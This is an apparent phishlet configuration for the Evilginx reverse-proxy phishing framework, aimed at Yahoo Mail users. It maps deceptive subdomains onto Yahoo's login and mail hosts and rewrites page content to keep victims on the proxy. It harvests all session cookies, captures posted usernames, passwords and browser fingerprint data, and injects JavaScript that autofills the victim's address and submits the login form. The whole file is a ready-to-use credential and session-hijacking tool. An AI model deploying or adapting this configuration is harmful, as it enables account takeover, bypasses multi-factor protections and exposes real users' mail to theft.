author: '@maxibrainz10'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
  - {phish_sub: 'masacil', orig_sub: 'mail', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
  - {phish_sub: 'logsin', orig_sub: 'login', domain: 'yahoo.com', session: true, is_landing: true, auto_filter: false}
  - {phish_sub: 'guce', orig_sub: 'guce', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
  - {phish_sub: 'udc', orig_sub: 'udc', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
  - {phish_sub: 'fc', orig_sub: 'fc', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false}
  - {phish_sub: 'ads', orig_sub: 'ads', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false}
  - {phish_sub: 'csp', orig_sub: 'csp', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false}
  - {phish_sub: 'yimg0', orig_sub: 's', domain: 'yimg.com', session: true, is_landing: false, auto_filter: false}
  - {phish_sub: 'yimg1', orig_sub: 's1', domain: 'yimg.com', session: true, is_landing: false, auto_filter: false}
  - {phish_sub: 'c.go-mpluse', orig_sub: 'c', domain: 'go-mpluse.net', session: true, is_landing: false, auto_filter: false}
  - {phish_sub: 's.go-mpluse', orig_sub: 's', domain: 'go-mpluse.net', session: true, is_landing: false, auto_filter: false}
  - {phish_sub: 'query', orig_sub: 'query', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
  - {phish_sub: 'beap-bc', orig_sub: 'beap-bc', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
  - {phish_sub: 'comet', orig_sub: 'server-dev.comet', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
  - {phish_sub: 'jsapi', orig_sub: 'jsapi', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
sub_filters:
  - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'jsapi.yahoo.com', orig_sub: 'jsapi', domain: 'yahoo.com', search: 'jsapi.yahoo.com', replace: 'jsapi.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'server-dev.comet.yahoo.com', orig_sub: 'server-dev.comet', domain: 'yahoo.com', search: 'server-dev.comet.yahoo.com', replace: 'server-dev.comet.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'beap-bc.yahoo.com', orig_sub: 'beap-bc', domain: 'yahoo.com', search: 'beap-bc.yahoo.com', replace: 'beap-bc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'query.yahoo.com', orig_sub: 'query', domain: 'yahoo.com', search: 'query.yahoo.com', replace: 'query.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 's.go-mpluse.net', orig_sub: 'query', domain: 'go-mpulse.net', search: 's.go-mpluse.net', replace: 's.go-mpluse.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'c.go-mpluse.net', orig_sub: 'query', domain: 'go-mpulse.net', search: 'c.go-mpluse.net', replace: 'c.go-mpluse.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 's.yimg.com', orig_sub: 's', domain: 'yimg.com', search: 's.yimg.com', replace: 'yimg0.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 's1.yimg.com', orig_sub: 's1', domain: 'yimg.com', search: 's1.yimg.com', replace: 'yimg1.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'mail.yahoo.com', orig_sub: 'mail', domain: 'yahoo.com', search: 'csp.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
  - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
auth_tokens:
  - domain: '.yahoo.com'
    keys: ['.*,regexp']
  - domain: 'mail.yahoo.com'
    keys: ['.*,regexp']
  - domain: 'login.yahoo.com'
    keys: ['.*,regexp']
  - domain: 'guce.yahoo.com'
    keys: ['.*,regexp']
  - domain: 'udc.yahoo.com'
    keys: ['.*,regexp']
credentials:
  username:
    key: 'username'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
  custom:
    - key: 'browser-fp-data'
      search: '(.*)'
      type: 'post'
auth_urls:
  - '/d/folders/'
  - '/d?guccounter'
login:
  domain: 'login.yahoo.com'
  path: '/?.src=ym&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd'
js_inject:
  - trigger_domains: ["login.yahoo.com"]
    trigger_paths: ["/*"]
    script: |
      window.addEventListener("load", () => {
        if (window.location.hash.length == 0) {
          return
        }
        function waitForElm(e){return new Promise(t=>{if(document.querySelector(e))return t(document.querySelector(e));const r=new MutationObserver(o=>{document.querySelector(e)&&(t(document.querySelector(e)),r.disconnect())});r.observe(document.body,{childList:!0,subtree:!0})})}
        waitForElm("#login-username").then((elm) => {
          elm.focus();
          elm.value = window.location.hash.slice(1);
          const submBtn = document.querySelector("#login-signin");
          submBtn.focus();
          submBtn.click();
        });
      });